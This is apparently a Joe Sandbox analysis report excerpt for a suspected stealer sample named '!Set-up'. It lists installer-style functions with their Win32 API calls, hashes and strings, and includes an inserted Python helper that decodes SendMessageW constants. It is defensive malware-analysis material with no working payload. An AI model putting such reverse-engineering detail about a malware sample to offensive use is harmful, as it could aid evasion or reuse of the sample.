                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                              APIs
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                              • String ID:
                                                              • API String ID: 4115351271-0
                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                              APIs
                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $ @$M$N
                                                              • API String ID: 1638840714-3479655940
                                                              • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                              • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
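The SendMessageW calls listed for the function above carry raw Win32 message constants (0x1109, 0x0143, 0x1132, 0x0419, ...). Naming them is what tells an analyst that this routine drives a tree-view and combo-box dialog, which helps separate generic UI code from the routines worth reversing in a stealer sample. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the `• API.MODULE(args), ref: ADDR` bullet format used in the "APIs" lists on this page (including the indented "Part of subcall function" entries) and names SendMessageW messages with constants from the public Win32 headers (winuser.h, commctrl.h). The name table is limited to constants that appear on this page; the sample lines are copied from the listing above.

```python
"""Parse Joe Sandbox "APIs" bullet lines and decode SendMessageW constants.

Added example for reading the function-level API listings in this report;
it is not part of the report or of the analysed sample. Message names come
from the public Win32 SDK headers (winuser.h, commctrl.h) and the table only
covers the constants seen in this report.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Report lines look like:
#   • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
#     • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(...), ref: 00405CC3
_API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

WM_USER = 0x0400
TV_FIRST = 0x1100

# Public Win32 constants for the messages that appear in this report.
MESSAGE_NAMES = {
    0x0028: "WM_NEXTDLGCTL",
    0x0200: "WM_MOUSEMOVE",
    0x0143: "CB_ADDSTRING",
    0x0147: "CB_GETCURSEL",
    0x014E: "CB_SETCURSEL",
    0x0150: "CB_GETITEMDATA",
    0x0151: "CB_SETITEMDATA",
    TV_FIRST + 2: "TVM_EXPAND",
    TV_FIRST + 9: "TVM_SETIMAGELIST",
    TV_FIRST + 10: "TVM_GETNEXTITEM",
    TV_FIRST + 27: "TVM_SETITEMHEIGHT",
    TV_FIRST + 28: "TVM_GETITEMHEIGHT",
    TV_FIRST + 50: "TVM_INSERTITEMW",
    TV_FIRST + 63: "TVM_SETITEMW",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # address of the call site ("ref:")
    subcall_of: Optional[int] = None  # set for "Part of subcall function" entries


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet from an "APIs" list; returns None for non-API lines."""
    m = _API_LINE.match(line)
    if not m:
        return None
    # Arguments are comma separated as printed by the sandbox. A string
    # argument that itself contained a comma would be split here; none of
    # the strings in this report do.
    raw = m.group("args")
    args = raw.split(",") if raw else []
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def decode_message(value: str) -> str:
    """Name a SendMessage uMsg argument as printed in the report ("00001109")."""
    try:
        msg = int(value, 16)
    except ValueError:
        return value  # "?" means the sandbox could not recover the argument
    if msg in MESSAGE_NAMES:
        return MESSAGE_NAMES[msg]
    if WM_USER <= msg < 0x8000:
        # Application-defined window messages; 0x0419 and 0x0420 above fall here.
        return f"WM_USER+0x{msg - WM_USER:X}"
    return f"0x{msg:04X}"


def decode_sendmessage_calls(lines):
    """Return (call-site address, message name) for each SendMessageW bullet."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        if call and call.api == "SendMessageW" and len(call.args) >= 2:
            out.append((call.ref, decode_message(call.args[1])))
    return out


# Lines copied verbatim from the "APIs" listing of the function above.
SAMPLE = """\
• GetDlgItem.USER32(?,000003F9), ref: 004049BF
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
""".splitlines()

if __name__ == "__main__":
    for ref, name in decode_sendmessage_calls(SAMPLE):
        print(f"{ref:08X}  SendMessageW  {name}")
```

Values between WM_USER (0x0400) and 0x7FFF, such as the 0x0419 and 0x0420 above, are private to the window class or application; the SDK cannot name them and their meaning has to come from the program itself. Arguments the sandbox could not recover are printed as "?" and are passed through unchanged.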
                                                              APIs
                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                              Strings
                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                              • ptF, xrefs: 00406D1A
                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                              • \*.*, xrefs: 00406D2F
                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                              • API String ID: 2035342205-1650287579
                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
